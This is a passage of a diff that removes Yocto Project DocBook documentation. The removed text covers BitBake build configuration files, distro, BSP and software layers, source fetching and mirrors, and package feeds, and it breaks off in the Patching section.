-                which is the build environment script.
-            </para>
-
-            <para>
-                Sourcing the build environment script creates a
-                <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
-                if one does not already exist.
-                BitBake uses the Build Directory for all its work during
-                builds.
-                The Build Directory has a <filename>conf</filename> directory
-                that contains default versions of your
-                <filename>local.conf</filename> and
-                <filename>bblayers.conf</filename> configuration files.
-                These default configuration files are created only if versions
-                do not already exist in the Build Directory at the time you
-                source the build environment setup script.
-            </para>
-
-            <para>
-                Because the Poky repository is fundamentally an aggregation of
-                existing repositories, some users might be familiar with
-                running the <filename>&OE_INIT_FILE;</filename> script
-                in the context of separate
-                <ulink url='&YOCTO_DOCS_REF_URL;#oe-core'>OpenEmbedded-Core</ulink>
-                and BitBake repositories rather than a single Poky repository.
-                This discussion assumes the script is executed from
-                within a cloned or unpacked version of Poky.
-            </para>
-
-            <para>
-                Depending on where the script is sourced, different
-                sub-scripts are called to set up the Build Directory
-                (Yocto or OpenEmbedded).
-                Specifically, the script
-                <filename>scripts/oe-setup-builddir</filename> inside the
-                poky directory sets up the Build Directory and seeds the
-                directory (if necessary) with configuration files appropriate
-                for the Yocto Project development environment.
-                <note>
-                    The <filename>scripts/oe-setup-builddir</filename> script
-                    uses the <filename>$TEMPLATECONF</filename> variable to
-                    determine which sample configuration files to locate.
-                </note>
-            </para>
-
-            <para>
-                The <filename>local.conf</filename> file provides many
-                basic variables that define a build environment.
-                Here is a list of a few.
-                To see the default configurations in a
-                <filename>local.conf</filename> file created by the build
-                environment script, see the
-                <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta-poky/conf/local.conf.sample'><filename>local.conf.sample</filename></ulink>
-                in the <filename>meta-poky</filename> layer:
-                <itemizedlist>
-                    <listitem><para>
-                        <emphasis>Target Machine Selection:</emphasis>
-                        Controlled by the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
-                        variable.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Download Directory:</emphasis>
-                        Controlled by the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-DL_DIR'><filename>DL_DIR</filename></ulink>
-                        variable.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Shared State Directory:</emphasis>
-                        Controlled by the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-SSTATE_DIR'><filename>SSTATE_DIR</filename></ulink>
-                        variable.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Build Output:</emphasis>
-                        Controlled by the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-TMPDIR'><filename>TMPDIR</filename></ulink>
-                        variable.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Distribution Policy:</emphasis>
-                        Controlled by the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO'><filename>DISTRO</filename></ulink>
-                        variable.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Packaging Format:</emphasis>
-                        Controlled by the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></ulink>
-                        variable.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>SDK Target Architecture:</emphasis>
-                        Controlled by the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-SDKMACHINE'><filename>SDKMACHINE</filename></ulink>
-                        variable.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Extra Image Packages:</emphasis>
-                        Controlled by the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_IMAGE_FEATURES'><filename>EXTRA_IMAGE_FEATURES</filename></ulink>
-                        variable.
-                        </para></listitem>
-                </itemizedlist>
-                <note>
-                    Configurations set in the
-                    <filename>conf/local.conf</filename> file can also be set
-                    in the <filename>conf/site.conf</filename> and
-                    <filename>conf/auto.conf</filename> configuration files.
-                </note>
-            </para>
-
-            <para>
-                The <filename>bblayers.conf</filename> file tells BitBake what
-                layers you want considered during the build.
-                By default, the layers listed in this file include layers
-                minimally needed by the build system.
-                However, you must manually add any custom layers you have
-                created.
-                You can find more information on working with the
-                <filename>bblayers.conf</filename> file in the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#enabling-your-layer'>Enabling Your Layer</ulink>"
-                section in the Yocto Project Development Tasks Manual.
-            </para>
-
-            <para>
-                The files <filename>site.conf</filename> and
-                <filename>auto.conf</filename> are not created by the
-                environment initialization script.
-                If you want the <filename>site.conf</filename> file, you
-                need to create that yourself.
-                The <filename>auto.conf</filename> file is typically created by
-                an autobuilder:
-                <itemizedlist>
-                    <listitem><para>
-                        <emphasis><filename>site.conf</filename>:</emphasis>
-                        You can use the <filename>conf/site.conf</filename>
-                        configuration file to configure multiple
-                        build directories.
-                        For example, suppose you had several build environments
-                        and they shared some common features.
-                        You can set these default build properties here.
-                        A good example is perhaps the packaging format to use
-                        through the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></ulink>
-                        variable.</para>
-
-                        <para>One useful scenario for using the
-                        <filename>conf/site.conf</filename> file is to extend
-                        your
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-BBPATH'><filename>BBPATH</filename></ulink>
-                        variable to include the path to a
-                        <filename>conf/site.conf</filename>.
-                        Then, when BitBake looks for Metadata using
-                        <filename>BBPATH</filename>, it finds the
-                        <filename>conf/site.conf</filename> file and applies
-                        your common configurations found in the file.
-                        To override configurations in a particular build
-                        directory, alter the similar configurations within
-                        that build directory's
-                        <filename>conf/local.conf</filename> file.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis><filename>auto.conf</filename>:</emphasis>
-                        The file is usually created and written to by
-                        an autobuilder.
-                        The settings put into the file are typically the
-                        same as you would find in the
-                        <filename>conf/local.conf</filename> or the
-                        <filename>conf/site.conf</filename> files.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                You can edit all configuration files to further define
-                any particular build environment.
-                This process is represented by the "User Configuration Edits"
-                box in the figure.
-            </para>
-
-            <para>
-                When you launch your build with the
-                <filename>bitbake <replaceable>target</replaceable></filename>
-                command, BitBake sorts out the configurations to ultimately
-                define your build environment.
-                It is important to understand that the
-                <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>
-                reads the configuration files in a specific order:
-                <filename>site.conf</filename>, <filename>auto.conf</filename>,
-                and <filename>local.conf</filename>.
-                And, the build system applies the normal assignment statement
-                rules as described in the
-                "<ulink url='&YOCTO_DOCS_BB_URL;#bitbake-user-manual-metadata'>Syntax and Operators</ulink>"
-                chapter of the BitBake User Manual.
-                Because the files are parsed in a specific order, variable
-                assignments for the same variable could be affected.
-                For example, if the <filename>auto.conf</filename> file and
-                the <filename>local.conf</filename> set
-                <replaceable>variable1</replaceable> to different values,
-                because the build system parses <filename>local.conf</filename>
-                after <filename>auto.conf</filename>,
-                <replaceable>variable1</replaceable> is assigned the value from
-                the <filename>local.conf</filename> file.
-            </para>
-        </section>
-
-        <section id="metadata-machine-configuration-and-policy-configuration">
-            <title>Metadata, Machine Configuration, and Policy Configuration</title>
-
-            <para>
-                The previous section described the user configurations that
-                define BitBake's global behavior.
-                This section takes a closer look at the layers the build system
-                uses to further control the build.
-                These layers provide Metadata for the software, machine, and
-                policies.
-            </para>
-
-            <para>
-                In general, three types of layer input exists.
-                You can see them below the "User Configuration" box in the
-                <link linkend='general-workflow-figure'>general workflow figure</link>:
-                <itemizedlist>
-                    <listitem><para>
-                        <emphasis>Metadata (<filename>.bb</filename> + Patches):</emphasis>
-                        Software layers containing user-supplied recipe files,
-                        patches, and append files.
-                        A good example of a software layer might be the
-                        <ulink url='https://github.com/meta-qt5/meta-qt5'><filename>meta-qt5</filename></ulink>
-                        layer from the
-                        <ulink url='http://layers.openembedded.org/layerindex/branch/master/layers/'>OpenEmbedded Layer Index</ulink>.
-                        This layer is for version 5.0 of the popular
-                        <ulink url='https://wiki.qt.io/About_Qt'>Qt</ulink>
-                        cross-platform application development framework for
-                        desktop, embedded and mobile.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Machine BSP Configuration:</emphasis>
-                        Board Support Package (BSP) layers (i.e. "BSP Layer"
-                        in the following figure) providing machine-specific
-                        configurations.
-                        This type of information is specific to a particular
-                        target architecture.
-                        A good example of a BSP layer from the
-                        <link linkend='gs-reference-distribution-poky'>Poky Reference Distribution</link>
-                        is the
-                        <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta-yocto-bsp'><filename>meta-yocto-bsp</filename></ulink>
-                        layer.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Policy Configuration:</emphasis>
-                        Distribution Layers (i.e. "Distro Layer" in the
-                        following figure) providing top-level or general
-                        policies for the images or SDKs being built for a
-                        particular distribution.
-                        For example, in the Poky Reference Distribution the
-                        distro layer is the
-                        <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta-poky'><filename>meta-poky</filename></ulink>
-                        layer.
-                        Within the distro layer is a
-                        <filename>conf/distro</filename> directory that
-                        contains distro configuration files (e.g.
-                        <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta-poky/conf/distro/poky.conf'><filename>poky.conf</filename></ulink>
-                        that contain many policy configurations for the
-                        Poky distribution.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                The following figure shows an expanded representation of
-                these three layers from the
-                <link linkend='general-workflow-figure'>general workflow figure</link>:
-            </para>
-
-            <para>
-                <imagedata fileref="figures/layer-input.png" align="center" width="8in" depth="8in" />
-            </para>
-
-            <para>
-                In general, all layers have a similar structure.
-                They all contain a licensing file
-                (e.g. <filename>COPYING.MIT</filename>) if the layer is to be
-                distributed, a <filename>README</filename> file as good
-                practice and especially if the layer is to be distributed, a
-                configuration directory, and recipe directories.
-                You can learn about the general structure for layers used with
-                the Yocto Project in the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-your-own-layer'>Creating Your Own Layer</ulink>"
-                section in the Yocto Project Development Tasks Manual.
-                For a general discussion on layers and the many layers from
-                which you can draw, see the
-                "<link linkend='overview-layers'>Layers</link>" and
-                "<link linkend='the-yocto-project-layer-model'>The Yocto Project Layer Model</link>"
-                sections both earlier in this manual.
-            </para>
-
-            <para>
-                If you explored the previous links, you discovered some
-                areas where many layers that work with the Yocto Project
-                exist.
-                The
-                <ulink url="http://git.yoctoproject.org/">Source Repositories</ulink>
-                also shows layers categorized under "Yocto Metadata Layers."
-                <note>
-                    Layers exist in the Yocto Project Source Repositories that
-                    cannot be found in the OpenEmbedded Layer Index.
-                    These layers are either deprecated or experimental
-                    in nature.
-                </note>
-            </para>
-
-            <para>
-                BitBake uses the <filename>conf/bblayers.conf</filename> file,
-                which is part of the user configuration, to find what layers it
-                should be using as part of the build.
-            </para>
-
-            <section id="distro-layer">
-                <title>Distro Layer</title>
-
-                <para>
-                    The distribution layer provides policy configurations for
-                    your distribution.
-                    Best practices dictate that you isolate these types of
-                    configurations into their own layer.
-                    Settings you provide in
-                    <filename>conf/distro/<replaceable>distro</replaceable>.conf</filename> override
-                    similar settings that BitBake finds in your
-                    <filename>conf/local.conf</filename> file in the Build
-                    Directory.
-                </para>
-
-                <para>
-                    The following list provides some explanation and references
-                    for what you typically find in the distribution layer:
-                    <itemizedlist>
-                        <listitem><para>
-                            <emphasis>classes:</emphasis>
-                            Class files (<filename>.bbclass</filename>) hold
-                            common functionality that can be shared among
-                            recipes in the distribution.
-                            When your recipes inherit a class, they take on the
-                            settings and functions for that class.
-                            You can read more about class files in the
-                            "<ulink url='&YOCTO_DOCS_REF_URL;#ref-classes'>Classes</ulink>"
-                            chapter of the Yocto Reference Manual.
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis>conf:</emphasis>
-                            This area holds configuration files for the
-                            layer (<filename>conf/layer.conf</filename>),
-                            the distribution
-                            (<filename>conf/distro/<replaceable>distro</replaceable>.conf</filename>),
-                            and any distribution-wide include files.
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis>recipes-*:</emphasis>
-                            Recipes and append files that affect common
-                            functionality across the distribution.
-                            This area could include recipes and append files
-                            to add distribution-specific configuration,
-                            initialization scripts, custom image recipes,
-                            and so forth.
-                            Examples of <filename>recipes-*</filename>
-                            directories are <filename>recipes-core</filename>
-                            and <filename>recipes-extra</filename>.
-                            Hierarchy and contents within a
-                            <filename>recipes-*</filename> directory can vary.
-                            Generally, these directories contain recipe files
-                            (<filename>*.bb</filename>), recipe append files
-                            (<filename>*.bbappend</filename>), directories
-                            that are distro-specific for configuration files,
-                            and so forth.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </section>
-
-            <section id="bsp-layer">
-                <title>BSP Layer</title>
-
-                <para>
-                    The BSP Layer provides machine configurations that
-                    target specific hardware.
-                    Everything in this layer is specific to the machine for
-                    which you are building the image or the SDK.
-                    A common structure or form is defined for BSP layers.
-                    You can learn more about this structure in the
-                    <ulink url='&YOCTO_DOCS_BSP_URL;'>Yocto Project Board Support Package (BSP) Developer's Guide</ulink>.
-                    <note>
-                        In order for a BSP layer to be considered compliant
-                        with the Yocto Project, it must meet some structural
-                        requirements.
-                    </note>
-                </para>
-
-                <para>
-                    The BSP Layer's configuration directory contains
-                    configuration files for the machine
-                    (<filename>conf/machine/<replaceable>machine</replaceable>.conf</filename>)
-                    and, of course, the layer
-                    (<filename>conf/layer.conf</filename>).
-                </para>
-
-                <para>
-                    The remainder of the layer is dedicated to specific recipes
-                    by function: <filename>recipes-bsp</filename>,
-                    <filename>recipes-core</filename>,
-                    <filename>recipes-graphics</filename>,
-                    <filename>recipes-kernel</filename>, and so forth.
-                    Metadata can exist for multiple formfactors, graphics
-                    support systems, and so forth.
-                    <note>
-                        While the figure shows several
-                        <filename>recipes-*</filename> directories, not all
-                        these directories appear in all BSP layers.
-                    </note>
-                </para>
-            </section>
-
-            <section id="software-layer">
-                <title>Software Layer</title>
-
-                <para>
-                    The software layer provides the Metadata for additional
-                    software packages used during the build.
-                    This layer does not include Metadata that is specific to
-                    the distribution or the machine, which are found in their
-                    respective layers.
-                </para>
-
-                <para>
-                    This layer contains any recipes, append files, and
-                    patches, that your project needs.
-                </para>
-            </section>
-        </section>
-
-        <section id="sources-dev-environment">
-            <title>Sources</title>
-
-            <para>
-                In order for the OpenEmbedded build system to create an
-                image or any target, it must be able to access source files.
-                The
-                <link linkend='general-workflow-figure'>general workflow figure</link>
-                represents source files using the "Upstream Project Releases",
-                "Local Projects", and "SCMs (optional)" boxes.
-                The figure represents mirrors, which also play a role in
-                locating source files, with the "Source Materials" box.
-            </para>
-
-            <para>
-                The method by which source files are ultimately organized is
-                a function of the project.
-                For example, for released software, projects tend to use
-                tarballs or other archived files that can capture the
-                state of a release guaranteeing that it is statically
-                represented.
-                On the other hand, for a project that is more dynamic or
-                experimental in nature, a project might keep source files in a
-                repository controlled by a Source Control Manager (SCM) such as
-                Git.
-                Pulling source from a repository allows you to control
-                the point in the repository (the revision) from which you
-                want to build software.
-                Finally, a combination of the two might exist, which would
-                give the consumer a choice when deciding where to get
-                source files.
-            </para>
-
-            <para>
-                BitBake uses the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-                variable to point to source files regardless of their location.
-                Each recipe must have a <filename>SRC_URI</filename> variable
-                that points to the source.
-            </para>
-
-            <para>
-                Another area that plays a significant role in where source
-                files come from is pointed to by the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-DL_DIR'><filename>DL_DIR</filename></ulink>
-                variable.
-                This area is a cache that can hold previously downloaded
-                source.
-                You can also instruct the OpenEmbedded build system to create
-                tarballs from Git repositories, which is not the default
-                behavior, and store them in the <filename>DL_DIR</filename>
-                by using the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-BB_GENERATE_MIRROR_TARBALLS'><filename>BB_GENERATE_MIRROR_TARBALLS</filename></ulink>
-                variable.
-            </para>
-
-            <para>
-                Judicious use of a <filename>DL_DIR</filename> directory can
-                save the build system a trip across the Internet when looking
-                for files.
-                A good method for using a download directory is to have
-                <filename>DL_DIR</filename> point to an area outside of your
-                Build Directory.
-                Doing so allows you to safely delete the Build Directory
-                if needed without fear of removing any downloaded source file.
-            </para>
-
-            <para>
-                The remainder of this section provides a deeper look into the
-                source files and the mirrors.
-                Here is a more detailed look at the source file area of the
-                <link linkend='general-workflow-figure'>general workflow figure</link>:
-            </para>
-
-            <para>
-                <imagedata fileref="figures/source-input.png" width="6in" depth="6in" align="center" />
-            </para>
-
-            <section id='upstream-project-releases'>
-                <title>Upstream Project Releases</title>
-
-                <para>
-                    Upstream project releases exist anywhere in the form of an
-                    archived file (e.g. tarball or zip file).
-                    These files correspond to individual recipes.
-                    For example, the figure uses specific releases each for
-                    BusyBox, Qt, and Dbus.
-                    An archive file can be for any released product that can be
-                    built using a recipe.
-                </para>
-            </section>
-
-            <section id='local-projects'>
-                <title>Local Projects</title>
-
-                <para>
-                    Local projects are custom bits of software the user
-                    provides.
-                    These bits reside somewhere local to a project - perhaps
-                    a directory into which the user checks in items (e.g.
-                    a local directory containing a development source tree
-                    used by the group).
-                </para>
-
-                <para>
-                    The canonical method through which to include a local
-                    project is to use the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-externalsrc'><filename>externalsrc</filename></ulink>
-                    class to include that local project.
-                    You use either the <filename>local.conf</filename> or a
-                    recipe's append file to override or set the
-                    recipe to point to the local directory on your disk to pull
-                    in the whole source tree.
-                </para>
-            </section>
-
-            <section id='scms'>
-                <title>Source Control Managers (Optional)</title>
-
-                <para>
-                    Another place from which the build system can get source
-                    files is with
-                    <ulink url='&YOCTO_DOCS_BB_URL;#bb-fetchers'>fetchers</ulink>
-                    employing various Source Control Managers (SCMs) such as
-                    Git or Subversion.
-                    In such cases, a repository is cloned or checked out.
-                    The
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-fetch'><filename>do_fetch</filename></ulink>
-                    task inside BitBake uses
-                    the <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-                    variable and the argument's prefix to determine the correct
-                    fetcher module.
-                    <note>
-                        For information on how to have the OpenEmbedded build
-                        system generate tarballs for Git repositories and place
-                        them in the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-DL_DIR'><filename>DL_DIR</filename></ulink>
-                        directory, see the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-BB_GENERATE_MIRROR_TARBALLS'><filename>BB_GENERATE_MIRROR_TARBALLS</filename></ulink>
-                        variable in the Yocto Project Reference Manual.
-                    </note>
-                </para>
-
-                <para>
-                    When fetching a repository, BitBake uses the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-SRCREV'><filename>SRCREV</filename></ulink>
-                    variable to determine the specific revision from which to
-                    build.
-                </para>
-            </section>
-
-            <section id='source-mirrors'>
-                <title>Source Mirror(s)</title>
-
-                <para>
-                    Two kinds of mirrors exist: pre-mirrors and regular
-                    mirrors.
-                    The
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PREMIRRORS'><filename>PREMIRRORS</filename></ulink>
-                    and
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-MIRRORS'><filename>MIRRORS</filename></ulink>
-                    variables point to these, respectively.
-                    BitBake checks pre-mirrors before looking upstream for any
-                    source files.
-                    Pre-mirrors are appropriate when you have a shared
-                    directory that is not a directory defined by the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-DL_DIR'><filename>DL_DIR</filename></ulink>
-                    variable.
-                    A Pre-mirror typically points to a shared directory that is
-                    local to your organization.
-                </para>
-
-                <para>
-                    Regular mirrors can be any site across the Internet
-                    that is used as an alternative location for source
-                    code should the primary site not be functioning for
-                    some reason or another.
-                </para>
-            </section>
-        </section>
-
-        <section id="package-feeds-dev-environment">
-            <title>Package Feeds</title>
-
-            <para>
-                When the OpenEmbedded build system generates an image or an
-                SDK, it gets the packages from a package feed area located
-                in the
-                <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
-                The
-                <link linkend='general-workflow-figure'>general workflow figure</link>
-                shows this package feeds area in the upper-right corner.
-            </para>
-
-            <para>
-                This section looks a little closer into the package feeds
-                area used by the build system.
-                Here is a more detailed look at the area:
-                <imagedata fileref="figures/package-feeds.png" align="center" width="7in" depth="6in" />
-            </para>
-
-            <para>
-                Package feeds are an intermediary step in the build process.
-                The OpenEmbedded build system provides classes to generate
-                different package types, and you specify which classes to
-                enable through the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></ulink>
-                variable.
-                Before placing the packages into package feeds,
-                the build process validates them with generated output quality
-                assurance checks through the
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-insane'><filename>insane</filename></ulink>
-                class.
-            </para>
-
-            <para>
-                The package feed area resides in the Build Directory.
-                The directory the build system uses to temporarily store
-                packages is determined by a combination of variables and the
-                particular package manager in use.
-                See the "Package Feeds" box in the illustration and note the
-                information to the right of that area.
-                In particular, the following defines where package files are
-                kept:
-                <itemizedlist>
-                    <listitem><para>
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPLOY_DIR'><filename>DEPLOY_DIR</filename></ulink>:
-                        Defined as <filename>tmp/deploy</filename> in the Build
-                        Directory.
-                        </para></listitem>
-                    <listitem><para>
-                        <filename>DEPLOY_DIR_*</filename>:
-                        Depending on the package manager used, the package type
-                        sub-folder.
-                        Given RPM, IPK, or DEB packaging and tarball creation,
-                        the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPLOY_DIR_RPM'><filename>DEPLOY_DIR_RPM</filename></ulink>,
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPLOY_DIR_IPK'><filename>DEPLOY_DIR_IPK</filename></ulink>,
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPLOY_DIR_DEB'><filename>DEPLOY_DIR_DEB</filename></ulink>,
-                        or
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPLOY_DIR_TAR'><filename>DEPLOY_DIR_TAR</filename></ulink>,
-                        variables are used, respectively.
-                        </para></listitem>
-                    <listitem><para>
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_ARCH'><filename>PACKAGE_ARCH</filename></ulink>:
-                        Defines architecture-specific sub-folders.
-                        For example, packages could exist for the i586 or
-                        qemux86 architectures.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                BitBake uses the
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package_write_deb'><filename>do_package_write_*</filename></ulink>
-                tasks to generate packages and place them into the package
-                holding area (e.g. <filename>do_package_write_ipk</filename>
-                for IPK packages).
-                See the
-                "<ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package_write_deb'><filename>do_package_write_deb</filename></ulink>",
-                "<ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package_write_ipk'><filename>do_package_write_ipk</filename></ulink>",
-                "<ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package_write_rpm'><filename>do_package_write_rpm</filename></ulink>",
-                and
-                "<ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package_write_tar'><filename>do_package_write_tar</filename></ulink>"
-                sections in the Yocto Project Reference Manual
-                for additional information.
-                As an example, consider a scenario where an IPK packaging
-                manager is being used and package architecture support for
-                both i586 and qemux86 exist.
-                Packages for the i586 architecture are placed in
-                <filename>build/tmp/deploy/ipk/i586</filename>, while packages
-                for the qemux86 architecture are placed in
-                <filename>build/tmp/deploy/ipk/qemux86</filename>.
-            </para>
-        </section>
-
-        <section id='bitbake-dev-environment'>
-            <title>BitBake</title>
-
-            <para>
-                The OpenEmbedded build system uses
-                <ulink url='&YOCTO_DOCS_REF_URL;#bitbake-term'>BitBake</ulink>
-                to produce images and Software Development Kits (SDKs).
-                You can see from the
-                <link linkend='general-workflow-figure'>general workflow figure</link>,
-                the BitBake area consists of several functional areas.
-                This section takes a closer look at each of those areas.
-                <note>
-                    Separate documentation exists for the BitBake tool.
-                    See the
-                    <ulink url='&YOCTO_DOCS_BB_URL;'>BitBake User Manual</ulink>
-                    for reference material on BitBake.
-                </note>
-            </para>
-
-            <section id='source-fetching-dev-environment'>
-                <title>Source Fetching</title>
-
-                <para>
-                    The first stages of building a recipe are to fetch and
-                    unpack the source code:
-                    <imagedata fileref="figures/source-fetching.png" align="center" width="6.5in" depth="5in" />
-                </para>
-
-                <para>
-                    The
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-fetch'><filename>do_fetch</filename></ulink>
-                    and
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-unpack'><filename>do_unpack</filename></ulink>
-                    tasks fetch the source files and unpack them into the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
-                    <note>
-                        For every local file (e.g. <filename>file://</filename>)
-                        that is part of a recipe's
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-                        statement, the OpenEmbedded build system takes a
-                        checksum of the file for the recipe and inserts the
-                        checksum into the signature for the
-                        <filename>do_fetch</filename> task.
-                        If any local file has been modified, the
-                        <filename>do_fetch</filename> task and all tasks that
-                        depend on it are re-executed.
-                    </note>
-                    By default, everything is accomplished in the Build
-                    Directory, which has a defined structure.
-                    For additional general information on the Build Directory,
-                    see the
-                    "<ulink url='&YOCTO_DOCS_REF_URL;#structure-core-build'><filename>build/</filename></ulink>"
-                    section in the Yocto Project Reference Manual.
-                </para>
-
-                <para>
-                    Each recipe has an area in the Build Directory where the
-                    unpacked source code resides.
-                    The
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-S'><filename>S</filename></ulink>
-                    variable points to this area for a recipe's unpacked source
-                    code.
-                    The name of that directory for any given recipe is defined
-                    from several different variables.
-                    The preceding figure and the following list describe
-                    the Build Directory's hierarchy:
-                    <itemizedlist>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-TMPDIR'><filename>TMPDIR</filename></ulink>:
-                            The base directory where the OpenEmbedded build
-                            system performs all its work during the build.
-                            The default base directory is the
-                            <filename>tmp</filename> directory.
-                            </para></listitem>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_ARCH'><filename>PACKAGE_ARCH</filename></ulink>:
-                            The architecture of the built package or packages.
-                            Depending on the eventual destination of the
-                            package or packages (i.e. machine architecture,
-                            <ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>build host</ulink>,
-                            SDK, or specific machine),
-                            <filename>PACKAGE_ARCH</filename> varies.
-                            See the variable's description for details.
-                            </para></listitem>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-TARGET_OS'><filename>TARGET_OS</filename></ulink>:
-                            The operating system of the target device.
-                            A typical value would be "linux" (e.g.
-                            "qemux86-poky-linux").
-                            </para></listitem>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink>:
-                            The name of the recipe used to build the package.
-                            This variable can have multiple meanings.
-                            However, when used in the context of input files,
-                            <filename>PN</filename> represents the the name
-                            of the recipe.
-                            </para></listitem>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink>:
-                            The location where the OpenEmbedded build system
-                            builds a recipe (i.e. does the work to create the
-                            package).
-                            <itemizedlist>
-                                <listitem><para>
-                                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>:
-                                    The version of the recipe used to build the
-                                    package.
-                                    </para></listitem>
-                                <listitem><para>
-                                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PR'><filename>PR</filename></ulink>:
-                                    The revision of the recipe used to build the
-                                    package.
-                                    </para></listitem>
-                            </itemizedlist>
-                            </para></listitem>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-S'><filename>S</filename></ulink>:
-                            Contains the unpacked source files for a given
-                            recipe.
-                            <itemizedlist>
-                                <listitem><para>
-                                    <ulink url='&YOCTO_DOCS_REF_URL;#var-BPN'><filename>BPN</filename></ulink>:
-                                    The name of the recipe used to build the
-                                    package.
-                                    The <filename>BPN</filename> variable is
-                                    a version of the <filename>PN</filename>
-                                    variable but with common prefixes and
-                                    suffixes removed.
-                                    </para></listitem>
-                                <listitem><para>
-                                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>:
-                                    The version of the recipe used to build the
-                                    package.
-                                    </para></listitem>
-                            </itemizedlist>
-                            </para></listitem>
-                    </itemizedlist>
-                    <note>
-                        In the previous figure, notice that two sample
-                        hierarchies exist: one based on package architecture (i.e.
-                        <filename>PACKAGE_ARCH</filename>) and one based on a
-                        machine (i.e. <filename>MACHINE</filename>).
-                        The underlying structures are identical.
-                        The differentiator being what the OpenEmbedded build
-                        system is using as a build target (e.g. general
-                        architecture, a build host, an SDK, or a specific
-                        machine).
-                    </note>
-                </para>
-            </section>
-
-            <section id='patching-dev-environment'>
-                <title>Patching</title>
-
-                <para>
-                    Once source code is fetched and unpacked, BitBake locates
-                    patch files and applies them to the source files:
-                    <imagedata fileref="figures/patching.png" align="center" width="7in" depth="6in" />
-                </para>
-
-                <para>
-                    The
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-patch'><filename>do_patch</filename></ulink>
